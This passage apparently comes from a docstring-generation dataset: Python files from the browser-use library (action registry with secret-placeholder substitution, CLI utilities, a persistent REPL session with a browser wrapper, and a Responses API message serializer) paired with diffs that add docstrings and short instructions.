# Type 2 pattern - need to unpack params
# If params is None, try to create it from kwargs
if params is None and action_params:
# Extract action params from kwargs
action_kwargs = {}
for param in action_params:
if param.name in kwargs:
action_kwargs[param.name] = kwargs[param.name]
if action_kwargs:
# Use the param_model which has the correct types defined
params = param_model(**action_kwargs)
# Build call_args by iterating through original function parameters in order
params_dict = params.model_dump() if params is not None else {}
for i, param in enumerate(parameters):
# Skip first param for Type 1 pattern (it's the model itself)
if param_model_provided and i == 0 and param.name not in special_param_names:
call_args.append(params)
elif param.name in special_param_names:
# This is a special parameter
if param.name in kwargs:
value = kwargs[param.name]
# Check if required special param is None
if value is None and param.default == Parameter.empty:
if param.name == 'browser_session':
raise ValueError(f'Action {func.__name__} requires browser_session but none provided.')
elif param.name == 'page_extraction_llm':
raise ValueError(f'Action {func.__name__} requires page_extraction_llm but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
elif param.name == 'page':
raise ValueError(f'Action {func.__name__} requires page but none provided.')
elif param.name == 'available_file_paths':
raise ValueError(f'Action {func.__name__} requires available_file_paths but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
else:
raise ValueError(f"{func.__name__}() missing required special parameter '{param.name}'")
call_args.append(value)
elif param.default != Parameter.empty:
call_args.append(param.default)
else:
# Special param is required but not provided
if param.name == 'browser_session':
raise ValueError(f'Action {func.__name__} requires browser_session but none provided.')
elif param.name == 'page_extraction_llm':
raise ValueError(f'Action {func.__name__} requires page_extraction_llm but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
elif param.name == 'page':
raise ValueError(f'Action {func.__name__} requires page but none provided.')
elif param.name == 'available_file_paths':
raise ValueError(f'Action {func.__name__} requires available_file_paths but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
else:
raise ValueError(f"{func.__name__}() missing required special parameter '{param.name}'")
else:
# This is an action parameter
if param.name in params_dict:
call_args.append(params_dict[param.name])
elif param.default != Parameter.empty:
call_args.append(param.default)
else:
raise ValueError(f"{func.__name__}() missing required parameter '{param.name}'")
# Call original function with positional args
if iscoroutinefunction(func):
return await func(*call_args)
else:
return await asyncio.to_thread(func, *call_args)
# Update wrapper signature to be kwargs-only
new_params = [Parameter('params', Parameter.KEYWORD_ONLY, default=None, annotation=Optional[param_model])]
# Add special params as keyword-only
for sp in special_params:
new_params.append(Parameter(sp.name, Parameter.KEYWORD_ONLY, default=sp.default, annotation=sp.annotation))
# Add **kwargs to accept and ignore extra params
new_params.append(Parameter('kwargs', Parameter.VAR_KEYWORD))
normalized_wrapper.__signature__ = sig.replace(parameters=new_params) # type: ignore[attr-defined]
return normalized_wrapper, param_model
# @time_execution_sync('--create_param_model')
def _create_param_model(self, function: Callable) -> type[BaseModel]:
sig = signature(function)
special_param_names = set(SpecialActionParameters.model_fields.keys())
params = {
name: (param.annotation, ... if param.default == param.empty else param.default)
for name, param in sig.parameters.items()
if name not in special_param_names
}
# TODO: make the types here work
return create_model(
f'{function.__name__}_parameters',
__base__=ActionModel,
**params, # type: ignore
)
def action(
self,
description: str,
param_model: type[BaseModel] | None = None,
domains: list[str] | None = None,
allowed_domains: list[str] | None = None,
terminates_sequence: bool = False,
):
# Handle aliases: domains and allowed_domains are the same parameter
if allowed_domains is not None and domains is not None:
raise ValueError("Cannot specify both 'domains' and 'allowed_domains' - they are aliases for the same parameter")
final_domains = allowed_domains if allowed_domains is not None else domains
def decorator(func: Callable):
# Skip registration if action is in exclude_actions
if func.__name__ in self.exclude_actions:
return func
# Normalize the function signature
normalized_func, actual_param_model = self._normalize_action_function_signature(func, description, param_model)
action = RegisteredAction(
name=func.__name__,
description=description,
function=normalized_func,
param_model=actual_param_model,
domains=final_domains,
terminates_sequence=terminates_sequence,
)
self.registry.actions[func.__name__] = action
# Return the normalized function so it can be called with kwargs
return normalized_func
return decorator
@observe_debug(ignore_input=True, ignore_output=True, name='execute_action')
@time_execution_async('--execute_action')
async def execute_action(
self,
action_name: str,
params: dict,
browser_session: BrowserSession | None = None,
page_extraction_llm: BaseChatModel | None = None,
file_system: FileSystem | None = None,
sensitive_data: dict[str, str | dict[str, str]] | None = None,
available_file_paths: list[str] | None = None,
extraction_schema: dict | None = None,
) -> Any:
if action_name not in self.registry.actions:
raise ValueError(f'Action {action_name} not found')
action = self.registry.actions[action_name]
try:
# Create the validated Pydantic model
try:
validated_params = action.param_model(**params)
except Exception as e:
raise ValueError(f'Invalid parameters {params} for action {action_name}: {type(e)}: {e}') from e
if sensitive_data:
# Get current URL if browser_session is provided
current_url = None
if browser_session and browser_session.agent_focus_target_id:
try:
# Get current page info from session_manager
target = browser_session.session_manager.get_target(browser_session.agent_focus_target_id)
if target:
current_url = target.url
except Exception:
pass
validated_params = self._replace_sensitive_data(validated_params, sensitive_data, current_url)
# Build special context dict
special_context = {
'browser_session': browser_session,
'page_extraction_llm': page_extraction_llm,
'available_file_paths': available_file_paths,
'has_sensitive_data': action_name == 'input' and bool(sensitive_data),
'file_system': file_system,
'extraction_schema': extraction_schema,
}
# Only pass sensitive_data to actions that explicitly need it (input)
if action_name == 'input':
special_context['sensitive_data'] = sensitive_data
# Add CDP-related parameters if browser_session is available
if browser_session:
# Add page_url
try:
special_context['page_url'] = await browser_session.get_current_page_url()
except Exception:
special_context['page_url'] = None
# Add cdp_client
special_context['cdp_client'] = browser_session.cdp_client
# All functions are now normalized to accept kwargs only
# Call with params and unpacked special context
try:
return await action.function(params=validated_params, **special_context)
except Exception as e:
raise
except ValueError as e:
# Preserve ValueError messages from validation
if 'requires browser_session but none provided' in str(e) or 'requires page_extraction_llm but none provided' in str(
e
):
raise RuntimeError(str(e)) from e
else:
raise RuntimeError(f'Error executing action {action_name}: {str(e)}') from e
except TimeoutError as e:
raise RuntimeError(f'Error executing action {action_name} due to timeout.') from e
except Exception as e:
raise RuntimeError(f'Error executing action {action_name}: {str(e)}') from e
def _log_sensitive_data_usage(self, placeholders_used: set[str], current_url: str | None) -> None:
if placeholders_used:
url_info = f' on {current_url}' if current_url and not is_new_tab_page(current_url) else ''
logger.info(f'🔒 Using sensitive data placeholders: {", ".join(sorted(placeholders_used))}{url_info}')
def _replace_sensitive_data(
self, params: BaseModel, sensitive_data: dict[str, Any], current_url: str | None = None
) -> BaseModel:
secret_pattern = re.compile(r'<secret>(.*?)</secret>')
# Set to track all missing placeholders across the full object
all_missing_placeholders = set()
# Set to track successfully replaced placeholders
replaced_placeholders = set()
# Process sensitive data based on format and current URL
applicable_secrets = {}
for domain_or_key, content in sensitive_data.items():
if isinstance(content, dict):
# New format: {domain_pattern: {key: value}}
# Only include secrets for domains that match the current URL
if current_url and not is_new_tab_page(current_url):
# it's a real url, check it using our custom allowed_domains scheme://*.example.com glob matching
if match_url_with_domain_pattern(current_url, domain_or_key):
applicable_secrets.update(content)
else:
# Old format: {key: value}, expose to all domains (only allowed for legacy reasons)
applicable_secrets[domain_or_key] = content
# Filter out empty values
applicable_secrets = {k: v for k, v in applicable_secrets.items() if v}
def recursively_replace_secrets(value: str | dict | list) -> str | dict | list:
if isinstance(value, str):
# 1. Handle tagged secrets: <secret>label</secret>
matches = secret_pattern.findall(value)
for placeholder in matches:
if placeholder in applicable_secrets:
# generate a totp code if secret is suffixed with bu_2fa_code
if placeholder.endswith('bu_2fa_code'):
totp = pyotp.TOTP(applicable_secrets[placeholder], digits=6)
replacement_value = totp.now()
else:
replacement_value = applicable_secrets[placeholder]
value = value.replace(f'<secret>{placeholder}</secret>', replacement_value)
replaced_placeholders.add(placeholder)
else:
# Keep track of missing placeholders
all_missing_placeholders.add(placeholder)
# 2. Handle literal secrets: "user_name" (no tags)
# This handles cases where the LLM forgets to use tags but uses the exact placeholder name
if value in applicable_secrets:
placeholder_name = value
if placeholder_name.endswith('bu_2fa_code'):
totp = pyotp.TOTP(applicable_secrets[placeholder_name], digits=6)
value = totp.now()
else:
value = applicable_secrets[placeholder_name]
replaced_placeholders.add(placeholder_name)
return value
elif isinstance(value, dict):
return {k: recursively_replace_secrets(v) for k, v in value.items()}
elif isinstance(value, list):
return [recursively_replace_secrets(v) for v in value]
return value
params_dump = params.model_dump()
processed_params = recursively_replace_secrets(params_dump)
# Log sensitive data usage
self._log_sensitive_data_usage(replaced_placeholders, current_url)
# Log a warning if any placeholders are missing
if all_missing_placeholders:
logger.warning(f'Missing or empty keys in sensitive_data dictionary: {", ".join(all_missing_placeholders)}')
return type(params).model_validate(processed_params)
# @time_execution_sync('--create_action_model')
def create_action_model(self, include_actions: list[str] | None = None, page_url: str | None = None) -> type[ActionModel]:
from typing import Union
# Filter actions based on page_url if provided:
# if page_url is None, only include actions with no filters
# if page_url is provided, only include actions that match the URL
available_actions: dict[str, RegisteredAction] = {}
for name, action in self.registry.actions.items():
if include_actions is not None and name not in include_actions:
continue
# If no page_url provided, only include actions with no filters
if page_url is None:
if action.domains is None:
available_actions[name] = action
continue
# Check domain filter if present
domain_is_allowed = self.registry._match_domains(action.domains, page_url)
# Include action if domain filter matches
if domain_is_allowed:
available_actions[name] = action
# Create individual action models for each action
individual_action_models: list[type[BaseModel]] = []
for name, action in available_actions.items():
# Create an individual model for each action that contains only one field
individual_model = create_model(
f'{name.title().replace("_", "")}ActionModel',
__base__=ActionModel,
**{
name: (
action.param_model,
Field(description=action.description),
) # type: ignore
},
)
individual_action_models.append(individual_model)
# If no actions available, return empty ActionModel
if not individual_action_models:
return create_model('EmptyActionModel', __base__=ActionModel)
# Create proper Union type that maintains ActionModel interface
if len(individual_action_models) == 1:
# If only one action, return it directly (no Union needed)
result_model = individual_action_models[0]
# Meaning the length is more than 1
else:
# Create a Union type using RootModel that properly delegates ActionModel methods
union_type = Union[tuple(individual_action_models)] # type: ignore : Typing doesn't understand that the length is >= 2 (by design)
class ActionModelUnion(RootModel[union_type]): # type: ignore
def get_index(self) -> int | None:
if hasattr(self.root, 'get_index'):
return self.root.get_index() # type: ignore
return None
def set_index(self, index: int):
if hasattr(self.root, 'set_index'):
self.root.set_index(index) # type: ignore
def model_dump(self, **kwargs):
if hasattr(self.root, 'model_dump'):
return self.root.model_dump(**kwargs) # type: ignore
return super().model_dump(**kwargs)
# Set the name for better debugging
ActionModelUnion.__name__ = 'ActionModel'
ActionModelUnion.__qualname__ = 'ActionModel'
result_model = ActionModelUnion
return result_model # type:ignore
def get_prompt_description(self, page_url: str | None = None) -> str:
return self.registry.get_prompt_description(page_url=page_url) | --- +++ @@ -30,6 +30,7 @@
class Registry(Generic[Context]):
+ """Service for registering and managing actions"""
def __init__(self, exclude_actions: list[str] | None = None):
self.registry = ActionRegistry()
@@ -38,6 +39,11 @@ self.exclude_actions = list(exclude_actions) if exclude_actions is not None else []
def exclude_action(self, action_name: str) -> None:
+ """Exclude an action from the registry after initialization.
+
+ If the action is already registered, it will be removed from the registry.
+ The action is also added to the exclude_actions list to prevent re-registration.
+ """
# Add to exclude list to prevent future registration
if action_name not in self.exclude_actions:
self.exclude_actions.append(action_name)
@@ -48,6 +54,7 @@ logger.debug(f'Excluded action "{action_name}" from registry')
def _get_special_param_types(self) -> dict[str, type | UnionType | None]:
+ """Get the expected types for special parameters from SpecialActionParameters"""
# Manually define the expected types to avoid issues with Optional handling.
# we should try to reduce this list to 0 if possible, give as few standardized objects to all the actions
# but each driver should decide what is relevant to expose the action methods,
@@ -70,6 +77,13 @@ description: str,
param_model: type[BaseModel] | None = None,
) -> tuple[Callable, type[BaseModel]]:
+ """
+ Normalize action function to accept only kwargs.
+
+ Returns:
+ - Normalized function that accepts (*_, params: ParamModel, **special_params)
+ - The param model to use for registration
+ """
sig = signature(func)
parameters = list(sig.parameters.values())
special_param_types = self._get_special_param_types()
@@ -153,6 +167,7 @@ # Step 4: Create normalized wrapper function
@functools.wraps(func)
async def normalized_wrapper(*args, params: BaseModel | None = None, **kwargs):
+ """Normalized action that only accepts kwargs"""
# Validate no positional args
if args:
raise TypeError(f'{func.__name__}() does not accept positional arguments, only keyword arguments are allowed')
@@ -257,6 +272,7 @@
# @time_execution_sync('--create_param_model')
def _create_param_model(self, function: Callable) -> type[BaseModel]:
+ """Creates a Pydantic model from function signature"""
sig = signature(function)
special_param_names = set(SpecialActionParameters.model_fields.keys())
params = {
@@ -279,6 +295,7 @@ allowed_domains: list[str] | None = None,
terminates_sequence: bool = False,
):
+ """Decorator for registering actions"""
# Handle aliases: domains and allowed_domains are the same parameter
if allowed_domains is not None and domains is not None:
raise ValueError("Cannot specify both 'domains' and 'allowed_domains' - they are aliases for the same parameter")
@@ -321,6 +338,7 @@ available_file_paths: list[str] | None = None,
extraction_schema: dict | None = None,
) -> Any:
+ """Execute a registered action with simplified parameter handling"""
if action_name not in self.registry.actions:
raise ValueError(f'Action {action_name} not found')
@@ -391,6 +409,7 @@ raise RuntimeError(f'Error executing action {action_name}: {str(e)}') from e
def _log_sensitive_data_usage(self, placeholders_used: set[str], current_url: str | None) -> None:
+ """Log when sensitive data is being used on a page"""
if placeholders_used:
url_info = f' on {current_url}' if current_url and not is_new_tab_page(current_url) else ''
logger.info(f'🔒 Using sensitive data placeholders: {", ".join(sorted(placeholders_used))}{url_info}')
@@ -398,6 +417,18 @@ def _replace_sensitive_data(
self, params: BaseModel, sensitive_data: dict[str, Any], current_url: str | None = None
) -> BaseModel:
+ """
+ Replaces sensitive data placeholders in params with actual values.
+
+ Args:
+ params: The parameter object containing <secret>placeholder</secret> tags
+ sensitive_data: Dictionary of sensitive data, either in old format {key: value}
+ or new format {domain_pattern: {key: value}}
+ current_url: Optional current URL for domain matching
+
+ Returns:
+ BaseModel: The parameter object with placeholders replaced by actual values
+ """
secret_pattern = re.compile(r'<secret>(.*?)</secret>')
# Set to track all missing placeholders across the full object
@@ -474,6 +505,12 @@
# @time_execution_sync('--create_action_model')
def create_action_model(self, include_actions: list[str] | None = None, page_url: str | None = None) -> type[ActionModel]:
+ """Creates a Union of individual action models from registered actions,
+ used by LLM APIs that support tool calling & enforce a schema.
+
+ Each action model contains only the specific action being used,
+ rather than all actions with most set to None.
+ """
from typing import Union
# Filter actions based on page_url if provided:
@@ -531,15 +568,18 @@
class ActionModelUnion(RootModel[union_type]): # type: ignore
def get_index(self) -> int | None:
+ """Delegate get_index to the underlying action model"""
if hasattr(self.root, 'get_index'):
return self.root.get_index() # type: ignore
return None
def set_index(self, index: int):
+ """Delegate set_index to the underlying action model"""
if hasattr(self.root, 'set_index'):
self.root.set_index(index) # type: ignore
def model_dump(self, **kwargs):
+ """Delegate model_dump to the underlying action model"""
if hasattr(self.root, 'model_dump'):
return self.root.model_dump(**kwargs) # type: ignore
return super().model_dump(**kwargs)
@@ -553,4 +593,9 @@ return result_model # type:ignore
def get_prompt_description(self, page_url: str | None = None) -> str:
- return self.registry.get_prompt_description(page_url=page_url)+ """Get a description of all actions for the prompt
+
+ If page_url is provided, only include actions that are available for that URL
+ based on their domain filters
+ """
+ return self.registry.get_prompt_description(page_url=page_url)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/registry/service.py |
Generate missing documentation strings |
from datetime import datetime, timezone
from browser_use_sdk import BrowserUse
_client: BrowserUse | None = None
def get_sdk_client() -> BrowserUse:
global _client
if _client is None:
from browser_use.skill_cli.api_key import require_api_key
api_key = require_api_key('Cloud API')
_client = BrowserUse(api_key=api_key)
return _client
def format_duration(started_at: datetime | None, finished_at: datetime | None) -> str:
if not started_at:
return ''
try:
if finished_at:
end = finished_at
else:
end = datetime.now(timezone.utc)
delta = end - started_at
total_seconds = int(delta.total_seconds())
if total_seconds < 60:
return f'{total_seconds}s'
elif total_seconds < 3600:
minutes = total_seconds // 60
seconds = total_seconds % 60
return f'{minutes}m {seconds}s'
else:
hours = total_seconds // 3600
minutes = (total_seconds % 3600) // 60
return f'{hours}h {minutes}m'
except Exception:
return '' | --- +++ @@ -1,3 +1,4 @@+"""Shared utilities for CLI command handlers."""
from datetime import datetime, timezone
@@ -7,6 +8,7 @@
def get_sdk_client() -> BrowserUse:
+ """Get authenticated SDK client (singleton)."""
global _client
if _client is None:
from browser_use.skill_cli.api_key import require_api_key
@@ -17,6 +19,7 @@
def format_duration(started_at: datetime | None, finished_at: datetime | None) -> str:
+ """Format duration between two timestamps, or elapsed time if still running."""
if not started_at:
return ''
@@ -40,4 +43,4 @@ minutes = (total_seconds % 3600) // 60
return f'{hours}h {minutes}m'
except Exception:
- return ''+ return ''
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/utils.py |
Provide docstrings following PEP 257 |
import asyncio
import io
import traceback
from contextlib import redirect_stderr, redirect_stdout
from dataclasses import dataclass, field
from pathlib import Path
from typing import TYPE_CHECKING, Any, Literal
if TYPE_CHECKING:
from browser_use.browser.session import BrowserSession
@dataclass
class ExecutionResult:
success: bool
output: str = ''
error: str | None = None
@dataclass
class PythonSession:
namespace: dict[str, Any] = field(default_factory=dict)
execution_count: int = 0
history: list[tuple[str, ExecutionResult]] = field(default_factory=list)
def __post_init__(self) -> None:
self.namespace.update(
{
'__name__': '__main__',
'__doc__': None,
'json': __import__('json'),
're': __import__('re'),
'os': __import__('os'),
'Path': Path,
'asyncio': asyncio,
}
)
def execute(
self, code: str, browser_session: 'BrowserSession', loop: asyncio.AbstractEventLoop | None = None
) -> ExecutionResult:
# Inject browser wrapper with the event loop for async operations
if loop is not None:
self.namespace['browser'] = BrowserWrapper(browser_session, loop)
self.execution_count += 1
stdout = io.StringIO()
stderr = io.StringIO()
try:
with redirect_stdout(stdout), redirect_stderr(stderr):
try:
# First try to compile as expression (for REPL-like behavior)
compiled = compile(code, '<input>', 'eval')
result = eval(compiled, self.namespace)
if result is not None:
print(repr(result))
except SyntaxError:
# Compile as statements
compiled = compile(code, '<input>', 'exec')
exec(compiled, self.namespace)
output = stdout.getvalue()
if stderr.getvalue():
output += stderr.getvalue()
result = ExecutionResult(success=True, output=output)
except Exception as e:
output = stdout.getvalue()
error_msg = traceback.format_exc()
result = ExecutionResult(success=False, output=output, error=error_msg)
self.history.append((code, result))
return result
def reset(self) -> None:
self.namespace.clear()
self.history.clear()
self.execution_count = 0
self.__post_init__()
def get_variables(self) -> dict[str, str]:
skip = {'__name__', '__doc__', 'json', 're', 'os', 'Path', 'asyncio', 'browser'}
return {k: type(v).__name__ for k, v in self.namespace.items() if not k.startswith('_') and k not in skip}
class BrowserWrapper:
def __init__(self, session: 'BrowserSession', loop: asyncio.AbstractEventLoop) -> None:
self._session = session
self._loop = loop
def _run(self, coro: Any) -> Any:
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return future.result(timeout=60)
@property
def url(self) -> str:
return self._run(self._get_url())
async def _get_url(self) -> str:
state = await self._session.get_browser_state_summary(include_screenshot=False)
return state.url if state else ''
@property
def title(self) -> str:
return self._run(self._get_title())
async def _get_title(self) -> str:
state = await self._session.get_browser_state_summary(include_screenshot=False)
return state.title if state else ''
def goto(self, url: str) -> None:
self._run(self._goto_async(url))
async def _goto_async(self, url: str) -> None:
from browser_use.browser.events import NavigateToUrlEvent
await self._session.event_bus.dispatch(NavigateToUrlEvent(url=url))
def click(self, index: int) -> None:
self._run(self._click_async(index))
async def _click_async(self, index: int) -> None:
from browser_use.browser.events import ClickElementEvent
node = await self._session.get_element_by_index(index)
if node is None:
raise ValueError(f'Element index {index} not found')
await self._session.event_bus.dispatch(ClickElementEvent(node=node))
def type(self, text: str) -> None:
self._run(self._type_async(text))
async def _type_async(self, text: str) -> None:
cdp_session = await self._session.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
raise RuntimeError('No active browser session')
await cdp_session.cdp_client.send.Input.insertText(
params={'text': text},
session_id=cdp_session.session_id,
)
def input(self, index: int, text: str) -> None:
self._run(self._input_async(index, text))
async def _input_async(self, index: int, text: str) -> None:
from browser_use.browser.events import ClickElementEvent, TypeTextEvent
node = await self._session.get_element_by_index(index)
if node is None:
raise ValueError(f'Element index {index} not found')
await self._session.event_bus.dispatch(ClickElementEvent(node=node))
await self._session.event_bus.dispatch(TypeTextEvent(node=node, text=text))
def scroll(self, direction: Literal['up', 'down', 'left', 'right'] = 'down', amount: int = 500) -> None:
self._run(self._scroll_async(direction, amount))
async def _scroll_async(self, direction: Literal['up', 'down', 'left', 'right'], amount: int) -> None:
from browser_use.browser.events import ScrollEvent
await self._session.event_bus.dispatch(ScrollEvent(direction=direction, amount=amount))
def screenshot(self, path: str | None = None) -> bytes:
data = self._run(self._session.take_screenshot())
if path:
Path(path).write_bytes(data)
return data
@property
def html(self) -> str:
return self._run(self._get_html())
async def _get_html(self) -> str:
cdp_session = await self._session.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
return ''
# Get the document root
doc = await cdp_session.cdp_client.send.DOM.getDocument(
params={},
session_id=cdp_session.session_id,
)
if not doc or 'root' not in doc:
return ''
# Get outer HTML of the root node
result = await cdp_session.cdp_client.send.DOM.getOuterHTML(
params={'nodeId': doc['root']['nodeId']},
session_id=cdp_session.session_id,
)
return result.get('outerHTML', '') if result else ''
def keys(self, keys: str) -> None:
self._run(self._keys_async(keys))
async def _keys_async(self, keys: str) -> None:
from browser_use.browser.events import SendKeysEvent
await self._session.event_bus.dispatch(SendKeysEvent(keys=keys))
def back(self) -> None:
self._run(self._back_async())
async def _back_async(self) -> None:
from browser_use.browser.events import GoBackEvent
await self._session.event_bus.dispatch(GoBackEvent())
def wait(self, seconds: float) -> None:
import time
time.sleep(seconds)
def extract(self, query: str) -> Any:
# This would need LLM integration
raise NotImplementedError('extract() requires LLM integration - use agent.run() instead') | --- +++ @@ -1,3 +1,4 @@+"""Jupyter-like persistent Python execution for browser-use CLI."""
import asyncio
import io
@@ -13,6 +14,7 @@
@dataclass
class ExecutionResult:
+ """Result of Python code execution."""
success: bool
output: str = ''
@@ -21,12 +23,18 @@
@dataclass
class PythonSession:
+ """Jupyter-like persistent Python execution.
+
+ Maintains a namespace across multiple code executions, allowing variables
+ to persist between commands. Provides a `browser` object for browser control.
+ """
namespace: dict[str, Any] = field(default_factory=dict)
execution_count: int = 0
history: list[tuple[str, ExecutionResult]] = field(default_factory=list)
def __post_init__(self) -> None:
+ """Initialize namespace with useful imports."""
self.namespace.update(
{
'__name__': '__main__',
@@ -42,6 +50,16 @@ def execute(
self, code: str, browser_session: 'BrowserSession', loop: asyncio.AbstractEventLoop | None = None
) -> ExecutionResult:
+ """Execute code in persistent namespace.
+
+ The `browser` variable is injected into the namespace before each execution,
+ providing a convenient wrapper around the BrowserSession.
+
+ Args:
+ code: Python code to execute
+ browser_session: The browser session for browser operations
+ loop: The event loop for async operations (required for browser access)
+ """
# Inject browser wrapper with the event loop for async operations
if loop is not None:
self.namespace['browser'] = BrowserWrapper(browser_session, loop)
@@ -78,28 +96,37 @@ return result
def reset(self) -> None:
+ """Clear namespace and history."""
self.namespace.clear()
self.history.clear()
self.execution_count = 0
self.__post_init__()
def get_variables(self) -> dict[str, str]:
+ """Get user-defined variables and their types."""
skip = {'__name__', '__doc__', 'json', 're', 'os', 'Path', 'asyncio', 'browser'}
return {k: type(v).__name__ for k, v in self.namespace.items() if not k.startswith('_') and k not in skip}
class BrowserWrapper:
+ """Convenient browser access for Python code.
+
+ Provides synchronous methods that wrap async BrowserSession operations.
+ Runs coroutines on the server's event loop using run_coroutine_threadsafe.
+ """
def __init__(self, session: 'BrowserSession', loop: asyncio.AbstractEventLoop) -> None:
self._session = session
self._loop = loop
def _run(self, coro: Any) -> Any:
+ """Run coroutine on the server's event loop."""
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return future.result(timeout=60)
@property
def url(self) -> str:
+ """Get current page URL."""
return self._run(self._get_url())
async def _get_url(self) -> str:
@@ -108,6 +135,7 @@
@property
def title(self) -> str:
+ """Get current page title."""
return self._run(self._get_title())
async def _get_title(self) -> str:
@@ -115,6 +143,7 @@ return state.title if state else ''
def goto(self, url: str) -> None:
+ """Navigate to URL."""
self._run(self._goto_async(url))
async def _goto_async(self, url: str) -> None:
@@ -123,6 +152,7 @@ await self._session.event_bus.dispatch(NavigateToUrlEvent(url=url))
def click(self, index: int) -> None:
+ """Click element by index."""
self._run(self._click_async(index))
async def _click_async(self, index: int) -> None:
@@ -134,6 +164,7 @@ await self._session.event_bus.dispatch(ClickElementEvent(node=node))
def type(self, text: str) -> None:
+ """Type text into focused element."""
self._run(self._type_async(text))
async def _type_async(self, text: str) -> None:
@@ -146,6 +177,7 @@ )
def input(self, index: int, text: str) -> None:
+ """Click element and type text."""
self._run(self._input_async(index, text))
async def _input_async(self, index: int, text: str) -> None:
@@ -158,6 +190,7 @@ await self._session.event_bus.dispatch(TypeTextEvent(node=node, text=text))
def scroll(self, direction: Literal['up', 'down', 'left', 'right'] = 'down', amount: int = 500) -> None:
+ """Scroll the page."""
self._run(self._scroll_async(direction, amount))
async def _scroll_async(self, direction: Literal['up', 'down', 'left', 'right'], amount: int) -> None:
@@ -166,6 +199,7 @@ await self._session.event_bus.dispatch(ScrollEvent(direction=direction, amount=amount))
def screenshot(self, path: str | None = None) -> bytes:
+ """Take screenshot, optionally save to file."""
data = self._run(self._session.take_screenshot())
if path:
Path(path).write_bytes(data)
@@ -173,6 +207,7 @@
@property
def html(self) -> str:
+ """Get page HTML."""
return self._run(self._get_html())
async def _get_html(self) -> str:
@@ -194,6 +229,7 @@ return result.get('outerHTML', '') if result else ''
def keys(self, keys: str) -> None:
+ """Send keyboard keys."""
self._run(self._keys_async(keys))
async def _keys_async(self, keys: str) -> None:
@@ -202,6 +238,7 @@ await self._session.event_bus.dispatch(SendKeysEvent(keys=keys))
def back(self) -> None:
+ """Go back in history."""
self._run(self._back_async())
async def _back_async(self) -> None:
@@ -210,10 +247,12 @@ await self._session.event_bus.dispatch(GoBackEvent())
def wait(self, seconds: float) -> None:
+ """Wait for specified seconds."""
import time
time.sleep(seconds)
def extract(self, query: str) -> Any:
+ """Extract data using LLM (requires API key)."""
# This would need LLM integration
- raise NotImplementedError('extract() requires LLM integration - use agent.run() instead')+ raise NotImplementedError('extract() requires LLM integration - use agent.run() instead')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/python_session.py |
Include argument descriptions in docstrings |
from typing import overload
from openai.types.responses.easy_input_message_param import EasyInputMessageParam
from openai.types.responses.response_input_image_param import ResponseInputImageParam
from openai.types.responses.response_input_message_content_list_param import (
ResponseInputMessageContentListParam,
)
from openai.types.responses.response_input_text_param import ResponseInputTextParam
from browser_use.llm.messages import (
AssistantMessage,
BaseMessage,
ContentPartImageParam,
ContentPartRefusalParam,
ContentPartTextParam,
SystemMessage,
UserMessage,
)
class ResponsesAPIMessageSerializer:
@staticmethod
def _serialize_content_part_text(part: ContentPartTextParam) -> ResponseInputTextParam:
return ResponseInputTextParam(text=part.text, type='input_text')
@staticmethod
def _serialize_content_part_image(part: ContentPartImageParam) -> ResponseInputImageParam:
return ResponseInputImageParam(
image_url=part.image_url.url,
detail=part.image_url.detail,
type='input_image',
)
@staticmethod
def _serialize_user_content(
content: str | list[ContentPartTextParam | ContentPartImageParam],
) -> str | ResponseInputMessageContentListParam:
if isinstance(content, str):
return content
serialized_parts: ResponseInputMessageContentListParam = []
for part in content:
if part.type == 'text':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_text(part))
elif part.type == 'image_url':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_image(part))
return serialized_parts
@staticmethod
def _serialize_system_content(
content: str | list[ContentPartTextParam],
) -> str | ResponseInputMessageContentListParam:
if isinstance(content, str):
return content
serialized_parts: ResponseInputMessageContentListParam = []
for part in content:
if part.type == 'text':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_text(part))
return serialized_parts
@staticmethod
def _serialize_assistant_content(
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
) -> str | ResponseInputMessageContentListParam | None:
if content is None:
return None
if isinstance(content, str):
return content
serialized_parts: ResponseInputMessageContentListParam = []
for part in content:
if part.type == 'text':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_text(part))
# Refusals are converted to text for the Responses API
elif part.type == 'refusal':
serialized_parts.append(ResponseInputTextParam(text=f'[Refusal: {part.refusal}]', type='input_text'))
return serialized_parts
@overload
@staticmethod
def serialize(message: UserMessage) -> EasyInputMessageParam: ...
@overload
@staticmethod
def serialize(message: SystemMessage) -> EasyInputMessageParam: ...
@overload
@staticmethod
def serialize(message: AssistantMessage) -> EasyInputMessageParam: ...
@staticmethod
def serialize(message: BaseMessage) -> EasyInputMessageParam:
if isinstance(message, UserMessage):
return EasyInputMessageParam(
role='user',
content=ResponsesAPIMessageSerializer._serialize_user_content(message.content),
)
elif isinstance(message, SystemMessage):
# Note: Responses API uses 'developer' role for system messages in some contexts,
# but 'system' is also supported via EasyInputMessageParam
return EasyInputMessageParam(
role='system',
content=ResponsesAPIMessageSerializer._serialize_system_content(message.content),
)
elif isinstance(message, AssistantMessage):
content = ResponsesAPIMessageSerializer._serialize_assistant_content(message.content)
# For assistant messages, we need to provide content
# If content is None but there are tool calls, we represent them as text
if content is None:
if message.tool_calls:
# Convert tool calls to a text representation for context
tool_call_text = '\n'.join(
f'[Tool call: {tc.function.name}({tc.function.arguments})]' for tc in message.tool_calls
)
content = tool_call_text
else:
content = ''
return EasyInputMessageParam(
role='assistant',
content=content,
)
else:
raise ValueError(f'Unknown message type: {type(message)}')
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[EasyInputMessageParam]:
return [ResponsesAPIMessageSerializer.serialize(m) for m in messages] | --- +++ @@ -1,3 +1,4 @@+"""Serializer for converting messages to OpenAI Responses API input format."""
from typing import overload
